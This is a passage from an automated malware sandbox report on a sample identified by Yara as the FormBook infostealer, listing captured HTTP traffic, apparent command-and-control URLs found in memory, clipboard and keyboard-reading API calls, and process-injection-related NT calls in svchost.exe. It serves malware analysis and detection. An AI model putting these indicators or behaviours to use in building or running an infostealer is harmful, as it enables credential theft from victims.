3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:55:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:55:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:55:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Fri, 29 Nov 2024 02:55:17 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j74Fw6WRGVn2hnwkvFm4Is6wXjRGfo7g6k%2FY091YXhZ9kBk5%2BYHVTPJkzdYxeEV5pf73ufYJmmj1Q6691z7aA2uxIPkjVYpFpLXIO%2FMMWUEC%2BFWS3QMVB2wr2CySOQPCFnvx0cb7JGU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9f5165bed842e3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1790&rtt_var=895&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:55:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Fri, 29 Nov 2024 02:55:20 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SKRb8yoGVZL23gdJNPyflO9%2BkZdPEtI5%2Bz5D%2BH3YMm80DKxfIkc%2BF%2BxOIox4wv0k64ALiM1RgqBE4UxzrejN5sQKYWAP3lg138Wua67r%2F3byZTjpiblwLPE6EDD1b6UidqQOPWOXyZM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9f51767b2d19b2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1804&rtt_var=902&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=147&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:55:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Fri, 29 Nov 2024 02:55:22 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Li5Ec%2Fm7NNYDKDwvterOOURG%2F6ihWFaWzfeJBGkyKw8WAbJEUr0p27ClgQMk0v5DTyIWt3Ql0PXf71qwOcBRPi0IfE1Q%2FuO971LIRYzRnHEcLWlIKF%2FYNSOPKY1Nts6ugU6WUaOXpuo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9f518709127c9c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1815&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:55:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Fri, 29 Nov 2024 02:55:25 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V28c3z12%2BSNBmS2bFzgxHBUo%2B4dlRUFWqRZaKAgwXQw44FPTmFR8LD940iCWJl0SWy%2FyVzDOk3%2B0oJIXCkIhLY9Qt6z%2F81YOtF6FNsyINk%2FOQGpnrU5qZRIu3D2IUUKKYMQo29mzSKM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9f519899af8ca7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1802&rtt_var=901&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=513&delivery_rate=0&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 29 Nov 2024 02:55:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 29 Nov 2024 02:55:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0

Source: winrs.exe, 00000004.00000002.3878963892.0000000004218000.00000004.10000000.00040000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000006.00000002.3878448789.0000000003718000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: winrs.exe, 00000004.00000002.3878963892.000000000453C000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3880431445.0000000006590000.00000004.00000800.00020000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000006.00000002.3878448789.0000000003A3C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1732848849.9703785119&other_args=eyJ1cmkiOiAiLzBnaX
Source: ohrkzzHWPesnQB.exe, 00000006.00000002.3879766244.0000000005499000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.maitreyatoys.world
Source: ohrkzzHWPesnQB.exe, 00000006.00000002.3879766244.0000000005499000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.maitreyatoys.world/dvmh/
Source: ohrkzzHWPesnQB.exe, 00000006.00000002.3878448789.0000000003A3C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www70.earbudsstore.shop/
Source: winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: winrs.exe, 00000004.00000002.3877333853.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: winrs.exe, 00000004.00000002.3877333853.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: winrs.exe, 00000004.00000002.3877333853.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: winrs.exe, 00000004.00000002.3877333853.0000000002EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: winrs.exe, 00000004.00000002.3877333853.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: winrs.exe, 00000004.00000002.3877333853.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: winrs.exe, 00000004.00000003.2311167707.0000000007FBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: winrs.exe, 00000004.00000002.3878963892.0000000003EF4000.00000004.10000000.00040000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000006.00000002.3878448789.00000000033F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2422082879.00000000098A4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://zkdamdjj.shop/vluw/?tz=vf30S8fHB&QtKtUpvP=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUI

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_01036B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_01036B0C

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_01036D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_01036D07

Source: C:\Users\user\Desktop\A2028041200SD.exe

0_2_01036B0C

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_01022B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_01022B37

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_0104F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0104F7FF

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3877193379.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2131899884.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3878300512.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3878218687.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2131524712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3878239458.0000000002E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3879766244.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2132464837.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00FE3D19
Source: A2028041200SD.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: A2028041200SD.exe, 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5de68dcc-4
Source: A2028041200SD.exe, 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_76df78ab-b
Source: A2028041200SD.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ac8403be-e
Source: A2028041200SD.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_d6aafe37-5

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C403 NtClose,	2_2_0042C403
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B60 NtClose,LdrInitializeThunk,	2_2_03472B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03472DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,	2_2_034735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474340 NtSetContextThread,	2_2_03474340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474650 NtSuspendThread,	2_2_03474650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BE0 NtQueryValueKey,	2_2_03472BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BF0 NtAllocateVirtualMemory,	2_2_03472BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B80 NtQueryInformationFile,	2_2_03472B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BA0 NtEnumerateValueKey,	2_2_03472BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AD0 NtReadFile,	2_2_03472AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AF0 NtWriteFile,	2_2_03472AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AB0 NtWaitForSingleObject,	2_2_03472AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F60 NtCreateProcessEx,	2_2_03472F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F30 NtCreateSection,	2_2_03472F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FE0 NtCreateFile,	2_2_03472FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F90 NtProtectVirtualMemory,	2_2_03472F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FA0 NtQuerySection,	2_2_03472FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FB0 NtResumeThread,	2_2_03472FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E30 NtWriteVirtualMemory,	2_2_03472E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EE0 NtQueueApcThread,	2_2_03472EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E80 NtReadVirtualMemory,	2_2_03472E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EA0 NtAdjustPrivilegesToken,	2_2_03472EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D00 NtSetInformationFile,	2_2_03472D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D10 NtMapViewOfSection,	2_2_03472D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D30 NtUnmapViewOfSection,	2_2_03472D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DD0 NtDelayExecution,	2_2_03472DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DB0 NtEnumerateKey,	2_2_03472DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C60 NtCreateKey,	2_2_03472C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C70 NtFreeVirtualMemory,	2_2_03472C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C00 NtQueryInformationProcess,	2_2_03472C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CC0 NtQueryVirtualMemory,	2_2_03472CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CF0 NtOpenProcess,	2_2_03472CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CA0 NtQueryInformationToken,	2_2_03472CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473010 NtOpenDirectoryObject,	2_2_03473010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473090 NtSetValueKey,	2_2_03473090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034739B0 NtGetContextThread,	2_2_034739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D70 NtOpenThread,	2_2_03473D70
